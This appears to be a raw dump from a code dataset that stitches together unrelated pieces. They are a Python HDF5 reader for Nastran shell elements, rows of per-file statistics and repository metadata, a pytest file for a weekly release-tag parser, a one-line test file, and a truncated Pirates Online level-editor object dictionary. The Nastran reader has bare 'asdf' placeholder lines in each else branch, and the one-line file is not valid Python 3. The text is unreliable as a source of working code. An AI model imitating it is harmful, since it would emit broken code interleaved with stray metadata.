nbytes : 4320
ndim : 1
parent : <HDF5 group "/NASTRAN/INPUT/ELEMENT" (1 members)>
ref : <HDF5 object reference>
regionref : <h5py._hl.base._RegionProxy object at 0x00000194FF9AA048>
scaleoffset : None
shape : (36,)
shuffle : True
size : 36
"""
geom_model.card_count[name] = len(group['EID'])
setattr(geom_model, name, group)
return
EID = group['EID']
PID = group['PID']
NIDS = group['G']
THETA = group['THETA']
ZOFFS = group['ZOFFS']
TFLAG = group['TFLAG']
T = group['T']
MCID = group['MCID']
DOMAIN_ID = group['DOMAIN_ID']
for eid, pid, nids, theta, zoffs, tflag, t, mcid in zip(EID, PID, NIDS, THETA, ZOFFS, TFLAG, T, MCID):
if mcid == -1:
theta_mcid = theta
else:
asdf
assert tflag == 0, tflag
t1, t2, t3, t4 = [ti if ti != -1.0 else None
for ti in t]
obj = geom_model.add_cquad4(
eid, pid, nids,
theta_mcid=theta_mcid, zoffset=zoffs, tflag=tflag,
T1=t1, T2=t2, T3=t3, T4=t4, comment='')
obj.validate()
def read_ctria6(name: str, group: h5py._hl.dataset.Dataset, geom_model: BDF) -> None:
EID = group['EID']
PID = group['PID']
NIDS = group['G']
THETA = group['THETA']
ZOFFS = group['ZOFFS']
TFLAG = group['TFLAG']
T = group['T']
MCID = group['MCID']
DOMAIN_ID = group['DOMAIN_ID']
for eid, pid, nids, theta, zoffs, tflag, t, mcid in zip(EID, PID, NIDS, THETA, ZOFFS, TFLAG, T, MCID):
if mcid == -1:
theta_mcid = theta
else:
asdf
assert tflag == 0, tflag
t1, t2, t3 = [ti if ti != -1.0 else None
for ti in t]
obj = geom_model.add_ctria6(
eid, pid, nids, theta_mcid=theta_mcid, zoffset=zoffs,
tflag=tflag, T1=t1, T2=t2, T3=t3, comment='')
obj.validate()
def read_cquad8(name: str, group: h5py._hl.dataset.Dataset, geom_model: BDF) -> None:
EID = group['EID']
PID = group['PID']
NIDS = group['G']
THETA = group['THETA']
ZOFFS = group['ZOFFS']
TFLAG = group['TFLAG']
T = group['T']
MCID = group['MCID']
DOMAIN_ID = group['DOMAIN_ID']
for eid, pid, nids, theta, zoffs, tflag, t, mcid in zip(EID, PID, NIDS, THETA, ZOFFS, TFLAG, T, MCID):
if mcid == -1:
theta_mcid = theta
else:
asdf
assert tflag == 0, tflag
t1, t2, t3, t4 = [ti if ti != -1.0 else None
for ti in t]
obj = geom_model.add_cquad8(
eid, pid, nids, theta_mcid=theta_mcid, zoffset=zoffs,
tflag=tflag, T1=t1, T2=t2, T3=t3, T4=t4, comment='')
obj.validate()
def read_ctriar(name: str, group: h5py._hl.dataset.Dataset, geom_model: BDF) -> None:
EID = group['EID']
PID = group['PID']
NIDS = group['G']
THETA = group['THETA']
ZOFFS = group['ZOFFS']
TFLAG = group['TFLAG']
T = group['T']
MCID = group['MCID']
DOMAIN_ID = group['DOMAIN_ID']
for eid, pid, nids, theta, zoffs, tflag, t, mcid in zip(EID, PID, NIDS, THETA, ZOFFS, TFLAG, T, MCID):
if mcid == -1:
theta_mcid = theta
else:
asdf
assert tflag == 0, tflag
t1, t2, t3= [ti if ti != -1.0 else None
for ti in t]
obj = geom_model.add_ctriar(
eid, pid, nids,
theta_mcid=theta_mcid, zoffset=zoffs, tflag=tflag,
T1=t1, T2=t2, T3=t3, comment='')
obj.validate()
def read_cquadr(name: str, group: h5py._hl.dataset.Dataset, geom_model: BDF) -> None:
#('EID', 'PID', 'G', 'THETA', 'ZOFFS', 'TFLAG', 'T', 'MCID', 'DOMAIN_ID')
EID = group['EID']
PID = group['PID']
NIDS = group['G']
THETA = group['THETA']
ZOFFS = group['ZOFFS']
TFLAG = group['TFLAG']
T = group['T']
MCID = group['MCID']
DOMAIN_ID = group['DOMAIN_ID']
for eid, pid, nids, theta, zoffs, tflag, t, mcid in zip(EID, PID, NIDS, THETA, ZOFFS, TFLAG, T, MCID):
if mcid == -1:
theta_mcid = theta
else:
asdf
assert tflag == 0, tflag
t1, t2, t3, t4 = [ti if ti != -1.0 else None
for ti in t]
obj = geom_model.add_cquadr(
eid, pid, nids,
theta_mcid=theta_mcid, zoffset=zoffs, tflag=tflag,
T1=t1, T2=t2, T3=t3, T4=t4, comment='')
obj.validate()
| 35.597938
| 185
| 0.552708
| 949
| 6,906
| 3.920969
| 0.132771
| 0.048374
| 0.056436
| 0.072561
| 0.781242
| 0.740124
| 0.740124
| 0.740124
| 0.740124
| 0.722386
| 0
| 0.043255
| 0.293658
| 6,906
| 193
| 186
| 35.782383
| 0.719557
| 0.179409
| 0
| 0.853333
| 0
| 0
| 0.040007
| 0
| 0
| 0
| 0
| 0
| 0.04
| 1
| 0.046667
| false
| 0
| 0.033333
| 0
| 0.093333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
718df44c644defbccaf0c01ece30c9353d11c419
| 1,286
|
py
|
Python
|
tests/test_eupsweeklymode.py
|
lsst-sqre/ltd-keeper
|
c658bcce726764e7416a8a386b418e83912b0f32
|
[
"Apache-2.0",
"MIT"
] | 5
|
2016-05-16T18:46:26.000Z
|
2019-07-08T15:16:41.000Z
|
tests/test_eupsweeklymode.py
|
lsst-sqre/ltd-keeper
|
c658bcce726764e7416a8a386b418e83912b0f32
|
[
"Apache-2.0",
"MIT"
] | 46
|
2016-02-18T16:54:36.000Z
|
2022-03-25T19:43:45.000Z
|
tests/test_eupsweeklymode.py
|
lsst-sqre/ltd-keeper
|
c658bcce726764e7416a8a386b418e83912b0f32
|
[
"Apache-2.0",
"MIT"
] | 4
|
2016-08-20T23:10:07.000Z
|
2022-03-25T19:52:09.000Z
|
"""Tests for `keeper.editiontracking.eupsweeklymode`."""
import pytest
from keeper.editiontracking.eupsweeklymode import WeeklyReleaseTag
def test_parsing() -> None:
tag = WeeklyReleaseTag("w_2018_01")
assert tag.year == 2018
assert tag.week == 1
tag = WeeklyReleaseTag("w_2018_26")
assert tag.year == 2018
assert tag.week == 26
# Git variant
tag = WeeklyReleaseTag("w.2018.01")
assert tag.year == 2018
assert tag.week == 1
# Git variant
tag = WeeklyReleaseTag("w.2018.26")
assert tag.year == 2018
assert tag.week == 26
with pytest.raises(ValueError):
WeeklyReleaseTag("v1_0")
with pytest.raises(ValueError):
WeeklyReleaseTag("w_2018")
with pytest.raises(ValueError):
WeeklyReleaseTag("w_2018_01rc1")
def test_comparisons() -> None:
assert WeeklyReleaseTag("w_2018_01") > WeeklyReleaseTag("w_2017_01")
assert not WeeklyReleaseTag("w_2018_01") < WeeklyReleaseTag("w_2017_01")
assert WeeklyReleaseTag("w_2018_20") >= WeeklyReleaseTag("w_2018_20")
assert WeeklyReleaseTag("w_2018_20") >= WeeklyReleaseTag("w_2018_01")
assert WeeklyReleaseTag("w_2018_20") <= WeeklyReleaseTag("w_2018_20")
assert not WeeklyReleaseTag("w_2018_20") == WeeklyReleaseTag("w_2018_01")
| 29.906977
| 77
| 0.7014
| 155
| 1,286
| 5.6
| 0.219355
| 0.352535
| 0.387097
| 0.158986
| 0.804147
| 0.748848
| 0.725806
| 0.617512
| 0.513825
| 0.403226
| 0
| 0.123936
| 0.178072
| 1,286
| 42
| 78
| 30.619048
| 0.697256
| 0.05832
| 0
| 0.392857
| 0
| 0
| 0.137874
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.071429
| false
| 0
| 0.071429
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
71d3813fc90c8d157d13e56a3cd6b93b7be4e173
| 20
|
py
|
Python
|
test/tokenize/t04.py
|
timmartin/skulpt
|
2e3a3fbbaccc12baa29094a717ceec491a8a6750
|
[
"MIT"
] | 2,671
|
2015-01-03T08:23:25.000Z
|
2022-03-31T06:15:48.000Z
|
test/tokenize/t04.py
|
csev/skulpt
|
9aa25b7dbf29f23ee8d3140d01a6f4353d12e66f
|
[
"MIT"
] | 972
|
2015-01-05T08:11:00.000Z
|
2022-03-29T13:47:15.000Z
|
test/tokenize/t04.py
|
csev/skulpt
|
9aa25b7dbf29f23ee8d3140d01a6f4353d12e66f
|
[
"MIT"
] | 845
|
2015-01-03T19:53:36.000Z
|
2022-03-29T18:34:22.000Z
|
2134568 != 01231515
| 10
| 19
| 0.75
| 2
| 20
| 7.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.882353
| 0.15
| 20
| 1
| 20
| 20
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
71d43a9d17f352358b20172e52ba68296aa81bc8
| 49,513
|
py
|
Python
|
pirates/leveleditor/worldData/interior_shanty_store_voodoo_destruction.py
|
Willy5s/Pirates-Online-Rewritten
|
7434cf98d9b7c837d57c181e5dabd02ddf98acb7
|
[
"BSD-3-Clause"
] | 81
|
2018-04-08T18:14:24.000Z
|
2022-01-11T07:22:15.000Z
|
pirates/leveleditor/worldData/interior_shanty_store_voodoo_destruction.py
|
Willy5s/Pirates-Online-Rewritten
|
7434cf98d9b7c837d57c181e5dabd02ddf98acb7
|
[
"BSD-3-Clause"
] | 4
|
2018-09-13T20:41:22.000Z
|
2022-01-08T06:57:00.000Z
|
pirates/leveleditor/worldData/interior_shanty_store_voodoo_destruction.py
|
Willy5s/Pirates-Online-Rewritten
|
7434cf98d9b7c837d57c181e5dabd02ddf98acb7
|
[
"BSD-3-Clause"
] | 26
|
2018-05-26T12:49:27.000Z
|
2021-09-11T09:11:59.000Z
|
from pandac.PandaModules import Point3, VBase3, Vec4, Vec3
objectStruct = {'Objects': {'1156268617.43dzlu0s': {'Type': 'Building Interior','Name': '','Instanced': True,'Objects': {'1167851208.51kmuller': {'Type': 'Interior_furnishings','DisableCollision': True,'Holiday': '','Hpr': VBase3(-136.14, 0.0, 0.0),'Pos': Point3(38.83, -27.794, 0.0),'Scale': VBase3(1.296, 1.296, 1.296),'VisSize': '','Visual': {'Model': 'models/props/stove_potbelly'}},'1167851297.48kmuller': {'Type': 'Furniture','DisableCollision': False,'Hpr': VBase3(-91.525, 0.0, 0.0),'Pos': Point3(41.663, 3.579, 0.0),'Scale': VBase3(1.0, 1.0, 1.0),'Visual': {'Color': (0.5199999809265137, 0.5199999809265137, 0.5299999713897705, 1.0),'Model': 'models/props/bench_shanty_2'}},'1167851350.63kmuller': {'Type': 'Furniture','DisableCollision': False,'Holiday': '','Hpr': VBase3(-42.586, 0.0, 0.0),'Pos': Point3(36.691, -21.999, 0.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/table_shanty_2'}},'1167851586.93kmuller': {'Type': 'Prop_Groups','DisableCollision': True,'Holiday': '','Hpr': VBase3(0.0, 0.0, 0.0),'Pos': Point3(40.047, 18.369, 12.256),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/prop_group_A'}},'1167851649.96kmuller': {'Type': 'Prop_Groups','DisableCollision': True,'Holiday': '','Hpr': VBase3(-153.316, 0.0, 0.0),'Pos': Point3(25.487, 30.597, 12.073),'Scale': VBase3(0.837, 0.837, 0.837),'VisSize': '','Visual': {'Model': 'models/props/prop_group_A'}},'1167851807.53kmuller': {'Type': 'Crate','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-19.041, -25.093, 12.07),'Scale': VBase3(0.833, 0.833, 0.833),'VisSize': '','Visual': {'Color': (0.4000000059604645, 0.4000000059604645, 0.4000000059604645, 1.0),'Model': 'models/props/crates_group_1'}},'1167851894.7kmuller': {'Type': 'Furniture','DisableCollision': True,'Holiday': '','Hpr': VBase3(-92.564, 0.0, 0.0),'Pos': Point3(-18.075, 12.111, 0.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.44999998807907104, 0.46000000834465027, 0.5099999904632568, 1.0),'Model': 'models/props/bookshelf_shanty'}},'1167851921.09kmuller': {'Type': 'Furniture','DisableCollision': True,'Holiday': '','Hpr': VBase3(-92.564, 0.0, 0.0),'Pos': Point3(-19.447, -5.306, 0.009),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.3499999940395355, 0.3499999940395355, 0.4099999964237213, 1.0),'Model': 'models/props/bookshelf_shanty'}},'1167852002.85kmuller': {'Type': 'Prop_Groups','DisableCollision': True,'Holiday': '','Hpr': VBase3(-179.781, 0.0, 0.0),'Pos': Point3(-2.462, 27.995, 0.0),'Scale': VBase3(0.774, 0.774, 0.774),'VisSize': '','Visual': {'Color': (0.4000000059604645, 0.4000000059604645, 0.4000000059604645, 1.0),'Model': 'models/props/prop_group_G'}},'1167852037.59kmuller': {'Type': 'Prop_Groups','DisableCollision': True,'Holiday': '','Hpr': VBase3(-12.176, 0.0, 0.0),'Pos': Point3(-12.594, 26.107, 0.061),'Scale': VBase3(0.753, 0.753, 0.753),'VisSize': '','Visual': {'Color': (0.44999998807907104, 0.46000000834465027, 0.5099999904632568, 1.0),'Model': 'models/props/prop_group_B'}},'1167853082.76kmuller': {'Type': 'Sack','DisableCollision': True,'Holiday': '','Hpr': VBase3(91.224, 0.0, 0.0),'Pos': Point3(-18.405, -9.81, 12.07),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.8899999856948853, 0.8799999952316284, 0.7900000214576721, 1.0),'Model': 'models/props/sack_6stack'}},'1167853258.42kmuller': {'Type': 'Sack','DisableCollision': False,'Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(1.618, 29.269, 12.07),'Scale': VBase3(0.895, 0.895, 0.895),'Visual': {'Model': 'models/props/sack_6stack'}},'1167853323.74kmuller': {'Type': 'Sack','DisableCollision': True,'Holiday': '','Hpr': VBase3(3.126, 0.0, 0.0),'Pos': Point3(8.229, -24.205, 0.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.44999998807907104, 0.46000000834465027, 0.5099999904632568, 1.0),'Model': 'models/props/sack_6stack'}},'1167853393.98kmuller': {'Type': 'Sack','DisableCollision': True,'Hpr': VBase3(3.126, 0.0, 0.0),'Pos': Point3(8.544, -28.068, 0.0),'Scale': VBase3(1.0, 1.0, 1.0),'Visual': {'Color': (0.3499999940395355, 0.3499999940395355, 0.4099999964237213, 1.0),'Model': 'models/props/sack_6stack'}},'1167853497.35kmuller': {'Type': 'Furniture','DisableCollision': True,'Holiday': '','Hpr': VBase3(-51.848, 0.0, 0.0),'Objects': {'1181175917.18kmuller': {'Type': 'Interior_furnishings','DisableCollision': False,'Holiday': '','Hpr': VBase3(-164.969, -74.63, 90.964),'Pos': Point3(-0.096, 1.166, 3.082),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/shop_voodoo_staff_skull'}}},'Pos': Point3(-13.006, -24.102, 0.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.4000000059604645, 0.4000000059604645, 0.4000000059604645, 1.0),'Model': 'models/props/table_shanty'}},'1167853515.07kmuller': {'Type': 'Furniture','DisableCollision': False,'Holiday': '','Hpr': VBase3(123.732, -85.339, 42.813),'Pos': Point3(-14.045, -21.466, 0.556),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.5, 0.5, 0.5, 1.0),'Model': 'models/props/chair_shanty'}},'1167854100.26kmuller': {'Type': 'Prop_Groups','DisableCollision': True,'Holiday': '','Hpr': VBase3(-28.429, 0.0, 0.0),'Pos': Point3(35.186, 24.898, 0.031),'Scale': VBase3(0.842, 0.842, 0.842),'VisSize': '','Visual': {'Model': 'models/props/prop_group_E'}},'1167867245.29kmuller': {'Type': 'Furniture','DisableCollision': False,'Holiday': '','Hpr': VBase3(-91.077, 0.0, 0.0),'Pos': Point3(41.052, 10.131, 0.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/cabinet_shanty_low'}},'1167867305.85kmuller': {'Type': 'Furniture','DisableCollision': True,'Holiday': '','Hpr': VBase3(-89.844, 0.0, 0.0),'Pos': Point3(-8.745, -7.978, 0.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.6000000238418579, 0.6000000238418579, 0.6000000238418579, 1.0),'Model': 'models/props/counter_shanty'}},'1167867328.81kmuller': {'Type': 'Furniture','DisableCollision': True,'Holiday': '','Hpr': VBase3(-89.844, -80.671, 0.0),'Pos': Point3(-10.569, 2.486, 0.782),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.5, 0.5, 0.5, 1.0),'Model': 'models/props/counter_shanty'}},'1167954371.88kmuller': {'Type': 'Furniture','DisableCollision': True,'Holiday': '','Hpr': VBase3(179.241, 0.0, 0.0),'Pos': Point3(28.331, -30.189, 0.0),'Scale': VBase3(1.113, 1.113, 1.113),'VisSize': '','Visual': {'Model': 'models/props/cabinet_shanty'}},'1167954448.33kmuller': {'Type': 'Crate','DisableCollision': True,'Holiday': '','Hpr': VBase3(88.03, -32.883, 0.0),'Pos': Point3(24.319, -30.172, 0.751),'Scale': VBase3(0.745, 0.745, 0.745),'VisSize': '','Visual': {'Model': 'models/props/crate_04'}},'1167954476.21kmuller': {'Type': 'Crate','DisableCollision': True,'Holiday': '','Hpr': VBase3(148.456, 1.141, 94.314),'Pos': Point3(32.155, -27.087, 1.169),'Scale': VBase3(0.668, 0.668, 0.668),'VisSize': '','Visual': {'Color': (1.0, 0.8399999737739563, 0.6800000071525574, 1.0),'Model': 'models/props/crate_04'}},'1167954660.96kmuller': {'Type': 'Bucket','DisableCollision': True,'Holiday': '','Hpr': VBase3(-43.324, 0.098, -83.945),'Pos': Point3(27.913, -28.467, 0.699),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/bucket_handles'}},'1167954776.51kmuller': {'Type': 'ChickenCage','DisableCollision': True,'Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-19.38, 25.084, 12.07),'Scale': VBase3(1.0, 1.0, 1.0),'Visual': {'Model': 'models/props/ChickenCage'}},'1167954805.24kmuller': {'Type': 'Baskets','DisableCollision': True,'Hpr': VBase3(-44.57, 0.0, 0.0),'Pos': Point3(-18.486, -30.008, 12.07),'Scale': VBase3(1.111, 1.111, 1.111),'Visual': {'Color': (0.44999998807907104, 0.46000000834465027, 0.5099999904632568, 1.0),'Model': 'models/props/crab_pot'}},'1167957475.65kmuller': {'Type': 'Pots','DisableCollision': False,'Hpr': VBase3(0.0, 0.0, 0.032),'Pos': Point3(38.63, -27.582, 4.366),'Scale': VBase3(1.512, 1.512, 1.512),'Visual': {'Model': 'models/props/pot_A'}},'1167957685.83kmuller': {'Type': 'Mortar_Pestle','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-8.401, -10.51, 3.597),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/mortar_pestle_stone'}},'1167957751.15kmuller': {'Type': 'Jugs_and_Jars','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(29.133, -29.639, 2.934),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/jar'}},'1167957802.44kmuller': {'Type': 'Jugs_and_Jars','DisableCollision': False,'Hpr': VBase3(27.545, 0.0, 0.0),'Pos': Point3(30.06, -29.864, 2.928),'Scale': VBase3(1.095, 1.095, 1.095),'Visual': {'Model': 'models/props/jug'}},'1167957927.05kmuller': {'Type': 'Jugs_and_Jars','DisableCollision': False,'Holiday': '','Hpr': VBase3(16.869, 0.0, 67.778),'Pos': Point3(26.048, -30.226, 3.103),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/largejug_A2'}},'1167958029.74kmuller': {'Type': 'ChickenCage','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(32.836, -29.562, 0.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/ChickenCage'}},'1167958411.18kmuller': {'Type': 'Jugs_and_Jars','DisableCollision': False,'Holiday': '','Hpr': VBase3(-106.543, 3.665, 87.489),'Pos': Point3(41.274, 6.311, 1.63),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/bottle_tan'}},'1167958482.3kmuller': {'Type': 'Jugs_and_Jars','DisableCollision': False,'Holiday': '','Hpr': VBase3(33.03, -84.141, 7.662),'Pos': Point3(38.77, 10.792, 0.138),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.6700000166893005, 0.7900000214576721, 0.7799999713897705, 1.0),'Model': 'models/props/bottle_red'}},'1167958587.96kmuller': {'Type': 'Furniture','DisableCollision': True,'Holiday': '','Hpr': VBase3(-179.115, 1.197, -91.865),'Pos': Point3(-11.512, -22.538, 0.682),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.5, 0.5, 0.5, 1.0),'Model': 'models/props/chair_shanty'}},'1167958623.43kmuller': {'Type': 'Trunks','DisableCollision': True,'Hpr': VBase3(90.592, 0.0, 0.0),'Pos': Point3(-19.614, -7.705, 4.173),'Scale': VBase3(0.413, 0.413, 0.413),'Visual': {'Color': (0.44999998807907104, 0.46000000834465027, 0.5099999904632568, 1.0),'Model': 'models/props/Trunk_rounded_2'}},'1167958659.04kmuller': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-87.405, 0.0, 0.0),'Pos': Point3(-8.197, 6.748, 6.649),'Scale': VBase3(1.0, 1.0, 1.0),'Visual': {'Model': 'models/props/garlicString'}},'1167958695.37kmuller': {'Type': 'Food','DisableCollision': False,'Holiday': '','Hpr': VBase3(-136.259, 0.0, 0.0),'Pos': Point3(-7.714, 7.661, 7.328),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/garlicString'}},'1167958771.16kmuller': {'Type': 'Mortar_Pestle','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-18.641, 5.686, 3.543),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/mortar_pestle_wood'}},'1167958796.77kmuller': {'Type': 'Baskets','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(8.343, 18.358, 0.025),'Scale': VBase3(1.935, 1.935, 1.935),'VisSize': '','Visual': {'Color': (0.75, 1.0, 0.8500000238418579, 1.0),'Model': 'models/props/basket'}},'1167958843.83kmuller': {'Type': 'Bucket','DisableCollision': True,'Holiday': '','Hpr': VBase3(0.0, -2.116, 0.0),'Pos': Point3(-14.994, 16.281, 0.416),'Scale': VBase3(0.57, 0.57, 0.57),'VisSize': '','Visual': {'Color': (0.49000000953674316, 0.47999998927116394, 0.4000000059604645, 1.0),'Model': 'models/props/washtub'}},'1167958939.32kmuller': {'Type': 'Bucket','DisableCollision': True,'Holiday': '','Hpr': VBase3(27.039, 0.0, 91.004),'Pos': Point3(-17.122, 17.622, 0.785),'Scale': VBase3(0.882, 0.882, 0.882),'VisSize': '','Visual': {'Color': (0.7900000214576721, 0.7799999713897705, 0.699999988079071, 1.0),'Model': 'models/props/bucket'}},'1167959032.44kmuller': {'Type': 'Jugs_and_Jars','DisableCollision': False,'Holiday': '','Hpr': VBase3(0.0, -80.41, 0.0),'Pos': Point3(-19.067, 8.691, 7.862),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/bottle_red'}},'1167959049.71kmuller': {'Type': 'Jugs_and_Jars','DisableCollision': False,'Holiday': '','Hpr': VBase3(39.072, 0.0, 0.0),'Pos': Point3(-9.812, 7.522, -0.138),'Scale': VBase3(0.532, 0.532, 0.532),'VisSize': '','Visual': {'Model': 'models/props/jug_hanging'}},'1167959560.85kmuller': {'Type': 'Rock','DisableCollision': True,'Hpr': VBase3(-132.948, -87.154, 28.308),'Pos': Point3(-20.055, -3.188, 4.614),'Scale': VBase3(0.52, 0.52, 0.52),'Visual': {'Color': (0.44999998807907104, 0.46000000834465027, 0.5099999904632568, 1.0),'Model': 'models/props/rock_3_sphere'}},'1167959641.15kmuller': {'Type': 'Rock','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-19.784, -5.038, 4.017),'Scale': VBase3(0.222, 0.222, 0.222),'VisSize': '','Visual': {'Color': (0.699999988079071, 0.699999988079071, 0.699999988079071, 1.0),'Model': 'models/props/rock_1_sphere'}},'1167971424.47kmuller': {'Type': 'Furniture','DisableCollision': True,'Holiday': '','Hpr': VBase3(-15.109, 0.0, 0.0),'Pos': Point3(-14.762, 5.101, 0.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.4000000059604645, 0.4000000059604645, 0.4000000059604645, 1.0),'Model': 'models/props/counter_shanty'}},'1167971619.35kmuller': {'Type': 'Furniture','DisableCollision': True,'Holiday': '','Hpr': VBase3(1.035, -79.112, 0.0),'Pos': Point3(-15.951, -14.135, 0.986),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.4000000059604645, 0.4000000059604645, 0.4000000059604645, 1.0),'Model': 'models/props/counter_shanty'}},'1167971752.08kmuller': {'Type': 'Light_Fixtures','DisableCollision': False,'Holiday': '','Hpr': VBase3(88.536, 0.0, 0.0),'Pos': Point3(-18.44, -0.45, 7.275),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/lamp_candle'}},'1167971774.92kmuller': {'Type': 'Light_Fixtures','DisableCollision': False,'Holiday': '','Hpr': VBase3(179.787, 0.0, 0.0),'Pos': Point3(-6.136, -19.449, 6.634),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/lamp_candle'}},'1167971834.25kmuller': {'Type': 'Light_Fixtures','DisableCollision': False,'Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(31.429, 20.834, 6.298),'Scale': VBase3(1.0, 1.0, 1.0),'Visual': {'Model': 'models/props/lamp_candle'}},'1174700283.27dzlu': {'Type': 'Light - Dynamic','Attenuation': '0.005','ConeAngle': '60.0000','DropOff': '0.0000','FlickRate': 0.5,'Flickering': True,'Hpr': VBase3(77.751, -26.68, 0.0),'Intensity': '0.9242','LightType': 'SPOT','Pos': Point3(56.329, -13.574, 20.382),'Scale': VBase3(1.0, 1.0, 1.0),'Visual': {'Color': (1, 1, 1, 1),'Model': 'models/props/light_tool_bulb'}},'1174700441.91dzlu': {'Type': 'Light - Dynamic','Attenuation': '0.005','ConeAngle': '60.0000','DropOff': '0.0000','FlickRate': '0.5000','Flickering': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Intensity': '0.2576','LightType': 'AMBIENT','Pos': Point3(24.384, 5.839, 0.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1, 1, 1, 1),'Model': 'models/props/light_tool_bulb'}},'1181175670.12kmuller': {'Type': 'Interior_furnishings','DisableCollision': False,'Holiday': '','Hpr': VBase3(37.818, 0.0, 0.0),'Pos': Point3(-15.26, 13.005, 0.083),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/shop_voodoo_doll'}},'1181175794.6kmuller': {'Type': 'Trunks','DisableCollision': True,'Hpr': VBase3(92.487, 0.0, 0.0),'Pos': Point3(-18.549, 10.268, 4.157),'Scale': VBase3(0.544, 0.544, 0.544),'Visual': {'Color': (0.43, 0.35, 0.35, 1.0),'Model': 'models/props/Trunk_rounded_2'}},'1181175986.39kmuller': {'Type': 'Interior_furnishings','DisableCollision': False,'Holiday': 'WinterFestival','Hpr': VBase3(-8.064, -0.326, -177.7),'Pos': Point3(-5.778, -8.661, -0.069),'Scale': VBase3(2.148, 2.148, 2.148),'VisSize': '','Visual': {'Color': (0.800000011920929, 0.800000011920929, 0.800000011920929, 1.0),'Model': 'models/props/shop_voodoo_doll'}},'1181176040.37kmuller': {'Type': 'Interior_furnishings','DisableCollision': False,'Holiday': '','Hpr': VBase3(93.048, -0.857, -161.592),'Pos': Point3(-19.013, 5.848, 3.485),'Scale': VBase3(2.008, 2.008, 2.008),'VisSize': '','Visual': {'Model': 'models/props/shop_voodoo_staff'}},'1181244708.62kmuller': {'Type': 'Pots','DisableCollision': False,'Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-19.696, -2.637, 6.143),'Scale': VBase3(1.403, 1.403, 1.403),'Visual': {'Model': 'models/props/pot_A'}},'1185470127.76kmuller': {'Type': 'Collision Barrier','DisableCollision': False,'Holiday': '','Hpr': 